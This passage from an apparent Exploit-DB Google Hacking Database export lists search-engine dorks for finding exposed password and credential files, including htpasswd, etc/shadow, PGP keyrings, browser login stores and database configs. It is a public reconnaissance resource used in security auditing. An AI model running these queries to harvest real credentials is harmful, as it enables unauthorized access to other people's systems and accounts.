<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6808</id>
<link>https://www.exploit-db.com/ghdb/6808</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;application-users.properties&quot; | &quot;mgmt-users.properties&quot; | &quot;*standalone.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;application-users.properties&quot; | &quot;mgmt-users.properties&quot; | &quot;*standalone.xml&quot;
# Files containing usernames and passwords in some cases...
# Date: 23/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;application-users.properties&quot; | &quot;mgmt-users.properties&quot; | &quot;*standalone.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;application-users.properties&quot; | &quot;mgmt-users.properties&quot; | &quot;*standalone.xml&quot;</querystring>
<edb></edb>
<date>2021-02-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6668</id>
<link>https://www.exploit-db.com/ghdb/6668</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.exs&quot; | &quot;dev.exs&quot; | &quot;test.exs&quot; | &quot;prod.secret.exs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.exs&quot; | &quot;dev.exs&quot; | &quot;test.exs&quot; | &quot;prod.secret.exs&quot;
# Sensitive directories containing many times usernames and passwords.
# Date: 12/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.exs&quot; | &quot;dev.exs&quot; | &quot;test.exs&quot; | &quot;prod.secret.exs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.exs&quot; | &quot;dev.exs&quot; | &quot;test.exs&quot; | &quot;prod.secret.exs&quot;</querystring>
<edb></edb>
<date>2020-11-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6059</id>
<link>https://www.exploit-db.com/ghdb/6059</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.neon&quot; OR &quot;config.local.neon&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.neon&quot; OR &quot;config.local.neon&quot;
# Juicy information, sensitive directories including db usernames and passwords.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.neon&quot; OR &quot;config.local.neon&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.neon&quot; OR &quot;config.local.neon&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7438</id>
<link>https://www.exploit-db.com/ghdb/7438</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials&quot;
# Files Containing Passwords
# Date:12/10/2021
# Exploit Author: Darkgen</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Darkgen</author>
</entry>
<entry>
<id>5804</id>
<link>https://www.exploit-db.com/ghdb/5804</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials.yml&quot;
# By using this dork, files containing encrypted credentials can be found.
# Date: 18/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials.yml&quot;</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5932</id>
<link>https://www.exploit-db.com/ghdb/5932</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;database.ini&quot; OR &quot;database.ini.old&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;database.ini&quot; OR &quot;database.ini.old&quot;
# Configuration files containing database usernames and passwords.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;database.ini&quot; OR &quot;database.ini.old&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;database.ini&quot; OR &quot;database.ini.old&quot;</querystring>
<edb></edb>
<date>2020-04-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5642</id>
<link>https://www.exploit-db.com/ghdb/5642</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.conf&quot;</shortDescription>
<textualDescription>Files containing password:
intitle:&quot;index of&quot; &quot;db.conf&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.conf&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5842</id>
<link>https://www.exploit-db.com/ghdb/5842</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.connection.js&quot;</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;index of&quot; &quot;db.connection.js&quot;
# By using this dork, some database passwords can be found.
# Date: 27/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.connection.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.connection.js&quot;</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5942</id>
<link>https://www.exploit-db.com/ghdb/5942</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.ini&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;db.ini&quot;
# Configuration files containing database usernames and passwords.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.ini&quot;</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5464</id>
<link>https://www.exploit-db.com/ghdb/5464</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ftp.passwd&quot;</shortDescription>
<textualDescription>files containing password:
intitle:&quot;index of&quot; &quot;ftp.passwd&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ftp.passwd&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ftp.passwd&quot;</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5459</id>
<link>https://www.exploit-db.com/ghdb/5459</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;htpasswd.txt&quot;</shortDescription>
<textualDescription>Files containing password:
intitle:&quot;index of&quot; &quot;htpasswd.txt&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;htpasswd.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;htpasswd.txt&quot;</querystring>
<edb></edb>
<date>2019-08-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6758</id>
<link>https://www.exploit-db.com/ghdb/6758</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;idx_config&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;idx_config&quot;
# Files containing usernames, passwords and much more...
# Date: 11/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;idx_config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;idx_config&quot;</querystring>
<edb></edb>
<date>2021-01-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6016</id>
<link>https://www.exploit-db.com/ghdb/6016</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;passwords.xlsx&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;passwords.xlsx&quot;
Description: This Google dork lists out sensitive passwords stored in a
excel file for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;passwords.xlsx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;passwords.xlsx&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5802</id>
<link>https://www.exploit-db.com/ghdb/5802</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;passwords.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;passwords.yml&quot;
# By using this dork, usernames and passwords can be found.
# Date: 18/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;passwords.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;passwords.yml&quot;</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7476</id>
<link>https://www.exploit-db.com/ghdb/7476</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;passwrod*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;password*&quot;
# Files Containing Passwords
# Date:22/10/2021
# Exploit Author: Roshdy Essam</textualDescription>
<query>intitle:&quot;index of&quot; &quot;passwrod*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;passwrod*&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>5931</id>
<link>https://www.exploit-db.com/ghdb/5931</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; application.ini</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; application.ini
# Applications' configuration files containing usernames and passwords.
# Date: 20/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; application.ini</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; application.ini</querystring>
<edb></edb>
<date>2020-04-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5820</id>
<link>https://www.exploit-db.com/ghdb/5820</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; dbconnect.inc</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; dbconnect.inc
# By using this dork, the dbconnect.inc file which contains the
password for the database administrator in clear text .. can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; dbconnect.inc</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; dbconnect.inc</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7863</id>
<link>https://www.exploit-db.com/ghdb/7863</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; htpasswd</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of” htpasswd
# Files Containing Passwords
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;Index of&quot; htpasswd</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; htpasswd</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>4752</id>
<link>https://www.exploit-db.com/ghdb/4752</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:&quot;.vscode&quot;</shortDescription>
<textualDescription>Description :
Microsoft Visual Code Editor files containing passwords and config
information.
Dork :
intitle:&quot;Index Of&quot; intext:&quot;.vscode&quot;
Author:
Vipin Joshi (@vocuzi)
</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:&quot;.vscode&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:&quot;.vscode&quot;</querystring>
<edb></edb>
<date>2018-04-09</date>
<author>vocuzi</author>
</entry>
<entry>
<id>4805</id>
<link>https://www.exploit-db.com/ghdb/4805</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; intext:&quot;Login Data&quot;</shortDescription>
<textualDescription>Description :
Google Chrome saved login credentials SQLite files.
Dork :
intitle:&quot;Index of&quot; intext:&quot;Login Data&quot;
Author:
Vipin Joshi (@vocuzi)
</textualDescription>
<query>intitle:&quot;Index of&quot; intext:&quot;Login Data&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; intext:&quot;Login Data&quot;</querystring>
<edb></edb>
<date>2018-05-07</date>
<author>vocuzi</author>
</entry>
<entry>
<id>4589</id>
<link>https://www.exploit-db.com/ghdb/4589</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:.ftpconfig</shortDescription>
<textualDescription>Description :
FTP/SFTP credentials in .ftpconfig file from Atom text editor.
Dork : intitle:&quot;Index Of&quot; intext:.ftpconfig
~Vocuzi</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:.ftpconfig</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:.ftpconfig</querystring>
<edb></edb>
<date>2017-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>181</id>
<link>https://www.exploit-db.com/ghdb/181</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; intext:connect.inc</shortDescription>
<textualDescription>These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted.</textualDescription>
<query>intitle:&quot;index of&quot; intext:connect.inc</query>
<querystring>https://www.google.com/search?q=intitle:%22index+of%22+intext:connect.inc+&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>199</id>
<link>https://www.exploit-db.com/ghdb/199</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; intext:globals.inc</shortDescription>
<textualDescription>contains plaintext user/pass for mysql database</textualDescription>
<query>intitle:&quot;index of&quot; intext:globals.inc</query>
<querystring>https://www.google.com/search?hl=nl&amp;q=intitle%3A%22index+of%22+intext%3Aglobals.inc&amp;lr=</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4954</id>
<link>https://www.exploit-db.com/ghdb/4954</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; intext:login.csv</shortDescription>
<textualDescription>intitle:&quot;index of&quot; intext:login.csv
This Google Dork discovers servers with open directories exposing login
information files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intitle:&quot;index of&quot; intext:login.csv</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:login.csv</querystring>
<edb></edb>
<date>2018-09-14</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4657</id>
<link>https://www.exploit-db.com/ghdb/4657</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:sftp-config.json</shortDescription>
<textualDescription>Description :
This dork returns list of FTP/SFTP passwords from sublime text.
Dork :
intitle:&quot;Index Of&quot; intext:sftp-config.json
Author :
Vipin Joshi ( @vocuzi )
</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:sftp-config.json</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:sftp-config.json</querystring>
<edb></edb>
<date>2018-01-12</date>
<author>vocuzi</author>
</entry>
<entry>
<id>5606</id>
<link>https://www.exploit-db.com/ghdb/5606</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; password.txt</shortDescription>
<textualDescription>Dork:
intitle:&quot;Index of&quot; password.txt
Author:Ismail Tasdelen
Info:
It contains password clear text sensitive information.
</textualDescription>
<query>intitle:&quot;Index of&quot; password.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; password.txt</querystring>
<edb></edb>
<date>2019-10-29</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>336</id>
<link>https://www.exploit-db.com/ghdb/336</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; passwords modified</shortDescription>
<textualDescription>These directories are named &quot;password.&quot; I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named &quot;password&quot; and single html files inside named things liks &quot;horny.htm&quot; or &quot;brittany.htm.&quot; These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using &quot;intitle&quot; and an extra keyword from the index page (in this case modified).</textualDescription>
<query>intitle:&quot;Index of&quot; passwords modified</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Index+of%22+passwords+modified</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>865</id>
<link>https://www.exploit-db.com/ghdb/865</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;Index of&quot; sc_serv.conf sc_serv content</shortDescription>
<textualDescription>This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26</textualDescription>
<query>intitle:&quot;Index of&quot; sc_serv.conf sc_serv content</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+sc_serv.conf+sc_serv++content</querystring>
<edb></edb>
<date>2005-02-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5722</id>
<link>https://www.exploit-db.com/ghdb/5722</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; share.passwd OR cloud.passwd OR ftp.passwd -public</shortDescription>
<textualDescription>Dorks containing passwords.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; share.passwd OR cloud.passwd OR ftp.passwd -public</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; share.passwd OR cloud.passwd OR ftp.passwd -public</querystring>
<edb></edb>
<date>2020-02-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4384</id>
<link>https://www.exploit-db.com/ghdb/4384</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of/&quot; CCCam.cfg</shortDescription>
<textualDescription>intitle:&quot;index of/&quot; CCCam.cfg
Config file contains User and Passwords of CCCam Servers.
Guillermo Gazón
Innotec System - Security Researchs
</textualDescription>
<query>intitle:&quot;index of/&quot; CCCam.cfg</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of/&quot; CCCam.cfg</querystring>
<edb></edb>
<date>2017-01-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4775</id>
<link>https://www.exploit-db.com/ghdb/4775</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;key3.db&quot; -mozilla.org</shortDescription>
<textualDescription>This dork finds Mozilla Firefox stored passwords, bookmarks, history and
many other information. It leads you to the &quot;.default&quot;
folder where Firefox stores all the user data.
Also try:
intitle:&quot;index.of&quot; &quot;permissions.sqlite&quot; &quot;cookies.sqlite&quot; -mozilla.org
The passwords are stored in two different files, both of which are required:
key3.dbkey4.db (or key3.db, or key4.db) - This file stores the key
database for the user's passwords. To transfer saved passwords, you must
copy this file along with the logins.json which have the saved passwords.
Other files are:
Bookmarks, Downloads and Browsing History -&gt; places.sqlite
Site-specific preferences -&gt; permissions.sqlite
Search engines -&gt; search.json.mozlz4
Personal dictionary -&gt; persdict.dat
Autocomplete history -&gt; formhistory.sqlite
Cookies -&gt; cookies.sqlite
Security certificate settings -&gt; cert8.dbcert9.db
File types and download actions -&gt; mimeTypes.rdfhandlers.json
Bruno Schmid
||
|
|https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;key3.db&quot; -mozilla.org</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;key3.db&quot; -mozilla.org</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4776</id>
<link>https://www.exploit-db.com/ghdb/4776</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;Mail&quot; thunderbird -mozilla.org -scan</shortDescription>
<textualDescription>Dork containing Thunderbird directories with very Juicy info and passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;Mail&quot; thunderbird -mozilla.org -scan</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; &quot;places.sqlite&quot; &quot;Mail&quot; thunderbird -mozilla.org -scan</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4823</id>
<link>https://www.exploit-db.com/ghdb/4823</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index.of&quot; inurl:&quot;cvs&quot; login | passwd | password | access | pass -github -pub</shortDescription>
<textualDescription>Files and directories containing passwords and other juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index.of&quot; inurl:&quot;cvs&quot; login | passwd | password | access | pass -github -pub</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; inurl:&quot;cvs&quot; login | passwd | password | access | pass -github -pub</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1012</id>
<link>https://www.exploit-db.com/ghdb/1012</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;phpinfo()&quot; +&quot;mysql.default_password&quot; +&quot;Zend Scripting Language Engine&quot;</shortDescription>
<textualDescription>This will look throught default phpinfo pages for ones that have a default mysql password.</textualDescription>
<query>intitle:&quot;phpinfo()&quot; +&quot;mysql.default_password&quot; +&quot;Zend Scripting Language Engine&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22phpinfo%28%29%22+%2B%22mysql.default_password%22+%2B%22Zend+Scripting+Language+Engine%22</querystring>
<edb></edb>
<date>2005-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>706</id>
<link>https://www.exploit-db.com/ghdb/706</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb</textualDescription>
<query>intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3Adupics+inurl%3A%28add.asp+%7C+default.asp+%7C+view.asp+%7C+voting.asp%29+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5732</id>
<link>https://www.exploit-db.com/ghdb/5732</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:index.of &quot;creds.txt&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;creds.txt&quot;
Description:
This dork queries google to find publicly available credential files.
Category:
Files Containing Juicy Info.
</textualDescription>
<query>intitle:index.of &quot;creds.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;creds.txt&quot;</querystring>
<edb></edb>
<date>2020-02-12</date>
<author>Sandesh Segu</author>
</entry>
<entry>
<id>113</id>
<link>https://www.exploit-db.com/ghdb/113</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:index.of administrators.pwd</shortDescription>
<textualDescription>This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public.</textualDescription>
<query>intitle:index.of administrators.pwd</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+administrators.pwd</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>115</id>
<link>https://www.exploit-db.com/ghdb/115</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:Index.of etc shadow</shortDescription>
<textualDescription>This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system.</textualDescription>
<query>intitle:Index.of etc shadow</query>
<querystring>https://www.google.com/search?q=intitle%3AIndex.of+etc+shadow</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>17</id>
<link>https://www.exploit-db.com/ghdb/17</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:index.of intext:&quot;secring.skr&quot;|&quot;secring.pgp&quot;|&quot;secring.bak&quot;</shortDescription>
<textualDescription>PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude.</textualDescription>
<query>intitle:index.of intext:&quot;secring.skr&quot;|&quot;secring.pgp&quot;|&quot;secring.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of+intext:%22secring.skr%22%7C%22secring.pgp%22%7C%22secring.bak%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1120</id>
<link>https://www.exploit-db.com/ghdb/1120</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:rapidshare intext:login</shortDescription>
<textualDescription>Rapidshare login passwords.</textualDescription>
<query>intitle:rapidshare intext:login</query>
<querystring>https://www.google.com/search?q=intitle%3Arapidshare+intext%3Alogin</querystring>
<edb></edb>
<date>2005-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>5141</id>
<link>https://www.exploit-db.com/ghdb/5141</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow</shortDescription>
<textualDescription>Description :
Django Web Framework email config plain-text Credentials.
Dork :
intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow
Author :
Vipin Joshi (@vocuzi)
</textualDescription>
<query>intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow</query>
<querystring>https://www.google.com/search?q=intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>vocuzi</author>
</entry>
<entry>
<id>5198</id>
<link>https://www.exploit-db.com/ghdb/5198</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow</shortDescription>
<textualDescription>Description :
Django Web Framework TLS using email configs containing login credentials
in Plain Text
Dork :
intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow
Author:
Vipin Joshi (@vocuzi)
</textualDescription>
<query>intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow</query>
<querystring>https://www.google.com/search?q=intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow</querystring>
<edb></edb>
<date>2019-05-06</date>
<author>vocuzi</author>
</entry>
<entry>
<id>7259</id>
<link>https://www.exploit-db.com/ghdb/7259</link>
<category>Files Containing Passwords</category>
<shortDescription>Inurl: &quot;login&quot; Intitle:index of username and pass</shortDescription>
<textualDescription># Google Dork: Inurl: &quot;login&quot; Intitle:index of username and pass
# Files Containing Passwords
# Date: 22/08/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>Inurl: &quot;login&quot; Intitle:index of username and pass</query>
<querystring>https://www.google.com/search?q=Inurl: &quot;login&quot; Intitle:index of username and pass</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>4421</id>
<link>https://www.exploit-db.com/ghdb/4421</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;-wp13.txt&quot;</shortDescription>
<textualDescription>Finds config files for MySQL, ABSPATH, Wordpress, and more!
Dxtroyer</textualDescription>
<query>inurl:&quot;-wp13.txt&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;-wp13.txt&quot;</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4806</id>
<link>https://www.exploit-db.com/ghdb/4806</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:&quot;/App.Config&quot; + ext:config + &quot;password=&quot; -github -git</shortDescription>
<textualDescription>inurl:&quot;/App.Config&quot; + ext:config + &quot;password=&quot; -github -git
File containing passwords
ManhNho
</textualDescription>
<query>inurl:&quot;/App.Config&quot; + ext:config + &quot;password=&quot; -github -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/App.Config&quot; + ext:config + &quot;password=&quot; -github -git</querystring>
<edb></edb>
<date>2018-05-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>3750</id>
